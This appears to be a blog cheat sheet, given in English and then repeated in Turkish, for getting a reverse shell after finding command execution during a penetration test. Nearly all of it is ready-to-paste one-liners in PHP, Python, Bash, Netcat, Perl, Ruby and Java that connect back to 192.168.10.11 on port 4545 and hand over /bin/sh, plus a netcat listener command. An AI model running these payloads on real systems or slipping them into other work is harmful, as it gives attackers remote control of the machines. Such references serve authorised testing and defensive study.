If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port.  This page deals with the former.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.

The examples shown are tailored to Unix-like systems.  Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.
Each of the methods below is aimed to be a one-liner that you can copy/paste.  As such they’re quite short lines, but not very readable.

The following examples 192.168.10.11 Local IP and the local port 4545 to listen

Php

php -r '$sock=fsockopen("192.168.10.11",4545);exec("/bin/sh -i <&3 >&3 2>&3");'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4545));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash

bash -i >& /dev/tcp/192.168.10.11/4545 0>&1

Netcat

nc -e /bin/sh 192.168.10.11 4545

Perl

perl -e 'use Socket;$i="192.168.10.11";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e'f=TCPSocket.open("192.168.10.11",4545).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.10.11/4545;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

EN | Reverse Shell Cheat Sheet Hakkı YÜCE

Bir sızma testinde hedef makina üzerinde komut çalıştırabilecek bir zafiyet yakalamışsınızdır ancak SSH keyi eklemenize yada benzer bir şekilde bağlantı açmanıza imkan vermiyor olabilir…
Bu durumda bir TCP porta reverse shell almak istersiniz.

Komut çalıştırarak reverse shell almanıza imkan sağlayacak etken hedef makinada çalışan betik  dilleridir, en stabil şekillerini sizin için “kopyala/yapıştır” kullanabileceğiniz bir şablon halinde hazırladık.

Bu komutu hedef üzerinde çalıştırmadan önce istek yapacağınız portu Netcat dinlemeye almanız gerekmektedir.

nc -lvp [port]

Aşağıdaki örneklerde 192.168.10.11 local IP ve 4545 ise dinleyeceğiniz local porttur

Php

php -r '$sock=fsockopen("192.168.10.11",4545);exec("/bin/sh -i <&3 >&3 2>&3");'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4545));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash

bash -i >& /dev/tcp/192.168.10.11/4545 0>&1

Netcat

nc -e /bin/sh 192.168.10.11 4545

Perl

perl -e 'use Socket;$i="192.168.10.11";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e'f=TCPSocket.open("192.168.10.11",4545).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.10.11/4545;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

TR | Reverse Shell Cheat Sheet Hakkı YÜCE